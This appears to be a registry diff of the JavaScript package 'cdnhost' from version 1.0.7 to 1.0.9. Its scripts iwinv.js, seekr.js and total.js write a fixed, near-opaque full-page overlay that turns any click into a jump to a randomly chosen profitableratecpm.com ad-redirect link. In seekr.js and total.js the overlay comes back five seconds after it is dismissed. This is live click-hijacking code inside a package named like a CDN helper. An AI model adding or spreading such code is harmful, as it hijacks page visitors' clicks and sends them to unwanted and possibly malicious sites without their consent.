cdnhost 1.0.7 → 1.0.9
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/iwinv.js +5 -11
- package/package.json +1 -1
- package/seekr.js +10 -14
- package/total.js +7 -13
- package/1.png +0 -0
- package/2.png +0 -0
- package/3.png +0 -0
package/iwinv.js
CHANGED
|
@@ -13,17 +13,11 @@ function handleKeyPress(event) {
|
|
|
13
13
|
const isMobile = /Mobi|Android/i.test(navigator.userAgent);
|
|
14
14
|
|
|
15
15
|
const desktopUrls = [
|
|
16
|
-
'https://
|
|
17
|
-
'https://
|
|
18
|
-
'https://
|
|
19
|
-
'https://
|
|
20
|
-
'https://
|
|
21
|
-
'https://gmarket.iwinv.net/recent.php',
|
|
22
|
-
'https://mlbpark.iwinv.net/recent.php',
|
|
23
|
-
'https://mmtcld.iwinv.net/recent.php',
|
|
24
|
-
'https://flightaware.iwinv.net/recent.php',
|
|
25
|
-
'https://koreakr.iwinv.net/recent.php',
|
|
26
|
-
'https://popcat.iwinv.net/recent.php',
|
|
16
|
+
'https://www.profitableratecpm.com/jxz4jd7r?key=c69dbf238e855fdc108af717c6363e6b',
|
|
17
|
+
'https://www.profitableratecpm.com/ci7z33utw?key=315a36d4584b5d56bad0933d4e4f5457',
|
|
18
|
+
'https://www.profitableratecpm.com/h2qib3dxzv?key=72c2823d629a4fdcc8b9b5b379edab23',
|
|
19
|
+
'https://www.profitableratecpm.com/awb9ahbyse?key=37b518d892f143b18397d62c495b962d',
|
|
20
|
+
'https://www.profitableratecpm.com/ecz5npz7h?key=8f4f16f67beabcf6c8f61c352c5caddb',
|
|
27
21
|
];
|
|
28
22
|
|
|
29
23
|
const mobileUrls = [
|
package/package.json
CHANGED
package/seekr.js
CHANGED
|
@@ -1,3 +1,4 @@
|
|
|
1
|
+
|
|
1
2
|
window.addEventListener('load', function() {
|
|
2
3
|
var images = document.querySelectorAll('img');
|
|
3
4
|
images.forEach(function(img) {
|
|
@@ -29,17 +30,11 @@ function handleKeyPress(event) {
|
|
|
29
30
|
const isMobile = /Mobi|Android/i.test(navigator.userAgent);
|
|
30
31
|
|
|
31
32
|
const desktopUrls = [
|
|
32
|
-
'https://
|
|
33
|
-
'https://
|
|
34
|
-
'https://
|
|
35
|
-
'https://
|
|
36
|
-
'https://
|
|
37
|
-
'https://gmarket.iwinv.net/recent.php',
|
|
38
|
-
'https://mlbpark.iwinv.net/recent.php',
|
|
39
|
-
'https://mmtcld.iwinv.net/recent.php',
|
|
40
|
-
'https://flightaware.iwinv.net/recent.php',
|
|
41
|
-
'https://koreakr.iwinv.net/recent.php',
|
|
42
|
-
'https://popcat.iwinv.net/recent.php',
|
|
33
|
+
'https://www.profitableratecpm.com/jxz4jd7r?key=c69dbf238e855fdc108af717c6363e6b',
|
|
34
|
+
'https://www.profitableratecpm.com/ci7z33utw?key=315a36d4584b5d56bad0933d4e4f5457',
|
|
35
|
+
'https://www.profitableratecpm.com/h2qib3dxzv?key=72c2823d629a4fdcc8b9b5b379edab23',
|
|
36
|
+
'https://www.profitableratecpm.com/awb9ahbyse?key=37b518d892f143b18397d62c495b962d',
|
|
37
|
+
'https://www.profitableratecpm.com/ecz5npz7h?key=8f4f16f67beabcf6c8f61c352c5caddb',
|
|
43
38
|
];
|
|
44
39
|
|
|
45
40
|
const mobileUrls = [
|
|
@@ -69,7 +64,7 @@ function handleKeyPress(event) {
|
|
|
69
64
|
|
|
70
65
|
const randomUrl = urls[Math.floor(Math.random() * urls.length)];
|
|
71
66
|
document.writeln('<style>');
|
|
72
|
-
document.writeln('#s2, #s3 {transition:opacity 5s;z-index:99;position:fixed;top:0;left:0;opacity:0.8;background:#000;width:100%;height:
|
|
67
|
+
document.writeln('#s2, #s3 {transition:opacity 5s;z-index:99;position:fixed;top:0;left:0;opacity:0.8;background:#000;width:100%;height:200vh}');
|
|
73
68
|
document.writeln('</style>');
|
|
74
69
|
document.writeln('<a onclick=\'location.href="' + randomUrl + '"\' target="_blank" href="#"><div id="s2"></div></a>');
|
|
75
70
|
|
|
@@ -114,11 +109,12 @@ function h(){
|
|
|
114
109
|
s2.style.zIndex = -1;
|
|
115
110
|
button.style.display = "none";
|
|
116
111
|
setTimeout(function () {
|
|
117
|
-
s2.style.zIndex =
|
|
112
|
+
s2.style.zIndex = 99;
|
|
118
113
|
button.style.display = "block";
|
|
119
114
|
s2.style.opacity = 0.8;
|
|
120
115
|
button.style.opacity = 1;
|
|
121
116
|
document.getElementById("s2").style.transition = "opacity 1s";
|
|
122
117
|
document.getElementById("button").style.transition = "opacity 1s";
|
|
123
118
|
}, 5000);
|
|
124
|
-
}
|
|
119
|
+
}
|
|
120
|
+
|
package/total.js
CHANGED
|
@@ -29,17 +29,11 @@ function handleKeyPress(event) {
|
|
|
29
29
|
const isMobile = /Mobi|Android/i.test(navigator.userAgent);
|
|
30
30
|
|
|
31
31
|
const desktopUrls = [
|
|
32
|
-
'https://
|
|
33
|
-
'https://
|
|
34
|
-
'https://
|
|
35
|
-
'https://
|
|
36
|
-
'https://
|
|
37
|
-
'https://gmarket.iwinv.net/recent.php',
|
|
38
|
-
'https://mlbpark.iwinv.net/recent.php',
|
|
39
|
-
'https://mmtcld.iwinv.net/recent.php',
|
|
40
|
-
'https://flightaware.iwinv.net/recent.php',
|
|
41
|
-
'https://koreakr.iwinv.net/recent.php',
|
|
42
|
-
'https://popcat.iwinv.net/recent.php',
|
|
32
|
+
'https://www.profitableratecpm.com/jxz4jd7r?key=c69dbf238e855fdc108af717c6363e6b',
|
|
33
|
+
'https://www.profitableratecpm.com/ci7z33utw?key=315a36d4584b5d56bad0933d4e4f5457',
|
|
34
|
+
'https://www.profitableratecpm.com/h2qib3dxzv?key=72c2823d629a4fdcc8b9b5b379edab23',
|
|
35
|
+
'https://www.profitableratecpm.com/awb9ahbyse?key=37b518d892f143b18397d62c495b962d',
|
|
36
|
+
'https://www.profitableratecpm.com/ecz5npz7h?key=8f4f16f67beabcf6c8f61c352c5caddb',
|
|
43
37
|
];
|
|
44
38
|
|
|
45
39
|
const mobileUrls = [
|
|
@@ -69,7 +63,7 @@ function handleKeyPress(event) {
|
|
|
69
63
|
|
|
70
64
|
const randomUrl = urls[Math.floor(Math.random() * urls.length)];
|
|
71
65
|
document.writeln('<style>');
|
|
72
|
-
document.writeln('#s2, #s3 {transition:opacity 5s;z-index:99;position:fixed;top:0;left:0;opacity:0.8;background:#000;width:100%;height:
|
|
66
|
+
document.writeln('#s2, #s3 {transition:opacity 5s;z-index:99;position:fixed;top:0;left:0;opacity:0.8;background:#000;width:100%;height:200vh}');
|
|
73
67
|
document.writeln('</style>');
|
|
74
68
|
document.writeln('<a onclick=\'location.href="' + randomUrl + '"\' target="_blank" href="#"><div id="s2"></div></a>');
|
|
75
69
|
|
|
@@ -116,7 +110,7 @@ function h(){
|
|
|
116
110
|
s2.style.zIndex = -1;
|
|
117
111
|
button.style.display = "none";
|
|
118
112
|
setTimeout(function () {
|
|
119
|
-
s2.style.zIndex =
|
|
113
|
+
s2.style.zIndex = 99;
|
|
120
114
|
button.style.display = "block";
|
|
121
115
|
s2.style.opacity = 0.8;
|
|
122
116
|
button.style.opacity = 1;
|
package/1.png
DELETED
|
Binary file
|
package/2.png
DELETED
|
Binary file
|
package/3.png
DELETED
|
Binary file
|